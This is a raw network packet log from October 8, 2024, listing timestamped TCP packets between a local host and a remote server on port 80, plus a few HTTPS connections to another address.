Oct 8, 2024 20:47:33.323728085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323743105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323760986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323780060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323796034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323807001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323829889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323846102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323867083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323875904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323899984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323919058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323932886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323945999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323961020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323978901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323995113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.324012995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.324044943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.324145079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.324191093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.324201107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.324225903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.324238062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.324261904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.324275970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.324294090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.324311018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.324327946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.324342966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.324378014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325193882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325226068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325252056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325263977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325267076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325310946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325320005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325352907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325375080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325388908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325400114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325423002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325439930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325455904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325473070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325505972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325529099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325545073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325576067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325584888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325608015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325656891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325705051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325719118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325731993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325757027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.325762033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325788975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.325810909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.326476097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.326533079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.326543093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.326581955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.326702118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.326711893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.326721907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.326726913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.326783895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.326801062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.327174902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.327186108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.327195883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.327213049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.327224016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.327228069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.327235937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.327246904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.327255964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.327275991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.327285051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.327836990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.327882051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.327888012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.327893972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.327924967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328083992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328094959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328104019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328114986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328136921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328157902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328212023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328222990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328232050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328243017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328254938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328263998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328264952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328278065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328284979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328290939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328301907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328305006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328313112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328316927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328325033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328346014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328368902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328408003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328418016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328427076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328438044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328448057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328459024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328474045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328490973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328541994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328552961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328562021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328574896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328591108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328592062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328603029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328614950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328617096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328624964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328630924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328635931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328663111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328684092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.328979015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328989983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.328999043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329030037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329030991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.329040051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329050064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329056025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.329061031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329071999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329080105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.329104900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.329114914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.329171896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329181910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329191923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329201937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329212904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329222918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.329224110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329233885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329246998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.329266071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.329283953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.329294920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.329597950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.390880108 CEST	443	49833	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.390932083 CEST	443	49833	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.391154051 CEST	49833	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.391300917 CEST	49833	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.391311884 CEST	443	49833	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.391319990 CEST	49833	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.391324043 CEST	443	49833	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.393958092 CEST	49837	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.394047976 CEST	443	49837	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.394138098 CEST	49837	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.394289017 CEST	49837	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.394319057 CEST	443	49837	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.397811890 CEST	443	49834	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.398418903 CEST	443	49834	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.398477077 CEST	49834	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.398492098 CEST	49834	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.398494959 CEST	443	49834	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.398503065 CEST	49834	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.398505926 CEST	443	49834	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.398508072 CEST	443	49835	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.398973942 CEST	443	49835	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.399045944 CEST	49835	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.399111986 CEST	49835	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.399111986 CEST	49835	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.399152040 CEST	443	49835	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.399178028 CEST	443	49835	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.400787115 CEST	49838	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.400835037 CEST	443	49838	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.400907040 CEST	49839	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.400984049 CEST	443	49839	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.400998116 CEST	49838	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.400998116 CEST	49838	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.401056051 CEST	49839	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.401058912 CEST	443	49838	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.401200056 CEST	49839	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.401232958 CEST	443	49839	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.409670115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.409724951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.409729004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.409774065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.409778118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.409812927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.409866095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.409868002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.409903049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.409917116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.409936905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.409955978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.409987926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410362005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410415888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410418987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410468102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410474062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410507917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410525084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410541058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410553932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410574913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410584927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410609961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410624027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410643101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410660028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410675049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410686970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410708904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410727978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410758972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410759926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410790920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410809040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410824060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410840034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410856009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410873890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410890102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410907030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410955906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.410954952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.410991907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411007881 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411026955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411040068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411060095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411075115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411092997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411108971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411144972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411158085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411191940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411210060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411227942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411243916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411261082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411274910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411293030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411310911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411325932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411340952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411360025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411381960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411413908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411448956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411452055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411469936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411484957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.411499977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.411534071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.412096977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.412149906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.412151098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.412184000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.412194967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.412235022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.412246943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.412281036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.412297964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.412317038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.412328005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.412360907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.412425995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.412475109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.413481951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413532972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.413533926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413566113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413580894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.413599014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413633108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413651943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.413666010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413681030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.413700104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413706064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.413748026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.413825035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413873911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.413875103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413911104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413923979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.413960934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.413961887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.413995981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414011955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414042950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414047003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414081097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414097071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414112091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414132118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414161921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414165020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414194107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414215088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414227009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414238930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414261103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414283037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414294004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414303064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414328098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414340973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414361000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414380074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414396048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414411068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414443970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.414940119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414973021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.414995909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415008068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415009975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415043116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415055990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415085077 CEST	80	49755	95.164.90.97	192.168.2.5
